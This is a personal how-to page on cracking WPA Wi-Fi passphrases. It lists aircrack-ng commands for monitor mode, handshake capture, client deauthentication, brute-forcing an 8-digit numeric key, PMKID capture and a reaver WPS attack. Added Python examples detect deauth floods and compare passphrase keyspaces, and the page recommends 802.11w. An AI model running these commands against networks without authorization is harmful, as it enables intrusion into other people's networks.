mkdocs-benoit.jp.net/docs/Howtos/HowtoCrackWPA.md

Last commit: Benoit S, 2021-02-20 12:32:58 +09:00, "🚚 Move all pages to docs/ 🔥 Also delete old pages"

## Monitor mode

For my RTL8188EUS:

```bash
ip link set wlanX down
iw dev wlanX set type monitor   # type can only be changed while the interface is down
ip link set wlanX up            # bring it back up so airodump-ng can use it
```

## Scan networks

All channels:

```bash
airodump-ng wlanX
```

Specific channel:

```bash
airodump-ng -c 6 wlanX
```

## Save a capture of chosen BSSID

```bash
airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX
```

You need to wait for a client to connect, or deauthenticate an already associated client so that it reconnects, in order to capture the 4-way handshake.

```bash
aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX
```

- `-a` is the access point (BSSID)
- `-c` is the client (station MAC)

Then you should have an EAPOL/WPA handshake; airodump-ng shows `WPA handshake: <BSSID>` in its top-right corner once the capture contains one.
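The deauthentication step above is also what a wireless IDS looks for from the defending side. The following is an added example, not code from the original page or from the aircrack-ng project: it runs a sliding-window counter over management-frame records and flags any source that sends many deauth/disassoc frames in a short span, which is the signature of a forced handshake. The frame records are constructed sample data in the shape a tshark export would give; the MAC addresses, window and threshold are assumptions to tune per site. The mitigation is 802.11w Protected Management Frames, which makes spoofed deauthentication frames fail integrity checking so clients ignore them.

```python
"""Flag deauthentication floods in 802.11 management-frame records.

Added example (not from the original page). Frame records, MACs, window and
threshold are constructed/assumed values.
"""
from collections import defaultdict, deque

MGMT = 0                 # 802.11 frame type: management
DEAUTH_SUBTYPE = 12
DISASSOC_SUBTYPE = 10
WINDOW_SECONDS = 1.0     # assumption: detection window
THRESHOLD = 10           # assumption: > 10 deauth/disassoc per source per window


def build_sample_frames():
    """Constructed records: (timestamp_s, frame_type, subtype, src_mac, dst_mac)."""
    ap = "00:23:b1:82:0c:01"        # constructed BSSID
    client = "d0:37:45:2f:52:01"    # constructed station MAC
    frames = [
        (100.00, MGMT, 8, ap, "ff:ff:ff:ff:ff:ff"),   # beacon
        (105.00, MGMT, DEAUTH_SUBTYPE, client, ap),   # client disconnects normally
    ]
    # 24 deauth frames "from" the AP to the client within half a second
    frames += [(160.0 + i * 0.02, MGMT, DEAUTH_SUBTYPE, ap, client) for i in range(24)]
    frames.append((160.80, MGMT, 0, client, ap))      # association request: client comes back
    return frames


def deauth_bursts(frames, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return {src_mac: (burst_start_ts, peak_count)} for every source that sends
    more than `threshold` deauth/disassoc frames inside any `window`-second span.
    Frames must be in ascending timestamp order."""
    recent = defaultdict(deque)
    bursts = {}
    for ts, ftype, subtype, src, _dst in frames:
        if ftype != MGMT or subtype not in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
            continue
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:         # slide the window forward
            q.popleft()
        if len(q) > threshold and len(q) > bursts.get(src, (0.0, 0))[1]:
            bursts[src] = (q[0], len(q))  # keep the peak count per source
    return bursts


def alert_lines(frames):
    """Human-readable alert per flooding source."""
    return [f"deauth flood: {src} sent {n} deauth/disassoc frames starting at t={t:.2f}s"
            for src, (t, n) in deauth_bursts(frames).items()]


if __name__ == "__main__":
    for line in alert_lines(build_sample_frames()):
        print(line)
```

The single deauth the client sends when it leaves normally never exceeds the threshold, so only the burst attributed to the AP's BSSID is reported; on a live sensor you would feed the same function from a capture filtered to management frames.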

## Crack WPA passphrase

For an 8-digit numeric scheme:

```bash
crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap
```

## Wireshark

PSK Generator: https://www.wireshark.org/tools/wpa-psk.html
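What the PSK generator linked above computes, and why the 8-digit scheme in the previous section is crackable at all, both come down to the same derivation. The following is an added example, not code from the original page or from Wireshark: it derives the PSK the way IEEE 802.11i specifies (PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 256 bits) and then compares the keyspace of a digits-only scheme with a longer printable-ASCII passphrase. The PSK-per-second rate is an assumption used only to make the comparison concrete; real hardware varies by orders of magnitude.

```python
"""WPA/WPA2-Personal PSK derivation and a keyspace check for the passphrase scheme.

Added example (not from the original page). The derivation is the 802.11i one;
the hash rate in scheme_report() is an assumed figure for relative comparison.
"""
import hashlib
import math

PBKDF2_ITERATIONS = 4096   # fixed by the 802.11i standard
PSK_BYTES = 32             # 256-bit PSK, used as the PMK


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit PSK from passphrase and SSID (PBKDF2-HMAC-SHA1)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PSK_BYTES)


def keyspace_bits(alphabet_size: int, length: int) -> float:
    """Entropy in bits of a passphrase drawn uniformly from alphabet_size^length."""
    return length * math.log2(alphabet_size)


def hours_to_exhaust(alphabet_size: int, length: int, psk_per_second: float) -> float:
    """Worst-case hours to derive every candidate PSK at the given rate."""
    return alphabet_size ** length / psk_per_second / 3600


def scheme_report(psk_per_second: float = 100_000.0) -> dict:
    """Compare the page's 8-digit scheme with a 12-character printable-ASCII passphrase.
    psk_per_second is an assumed rate, not a measurement."""
    schemes = {"8 digits": (10, 8), "12 printable ASCII": (94, 12)}
    return {name: {"bits": round(keyspace_bits(a, n), 1),
                   "hours": hours_to_exhaust(a, n, psk_per_second)}
            for name, (a, n) in schemes.items()}


if __name__ == "__main__":
    # "password" / "IEEE" is the published 802.11i test vector
    print(wpa_psk("password", "IEEE").hex())
    for name, r in scheme_report().items():
        print(f"{name:20s} {r['bits']:6.1f} bits  {r['hours']:.3g} h worst case")
```

The 4096 iterations are the only thing slowing a dictionary run down; with a digits-only scheme there are just 10^8 candidates, so the iteration count buys nothing. A passphrase check that rejects short or single-class schemes is the practical mitigation.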

## PMKID method

```bash
hcxdumptool -i wlanX -o PMKID --enable_status=1
```

TODO...

## WPS method

The AP must have WPS enabled in PIN mode, not PBC (push-button) mode.

```bash
reaver -i wlanX -b 00:23:B1:82:84:xx
```

## Resources

- https://github.com/ZerBea/hcxdumptool
- https://github.com/ZerBea/hcxtools
- https://wpa-sec.stanev.org/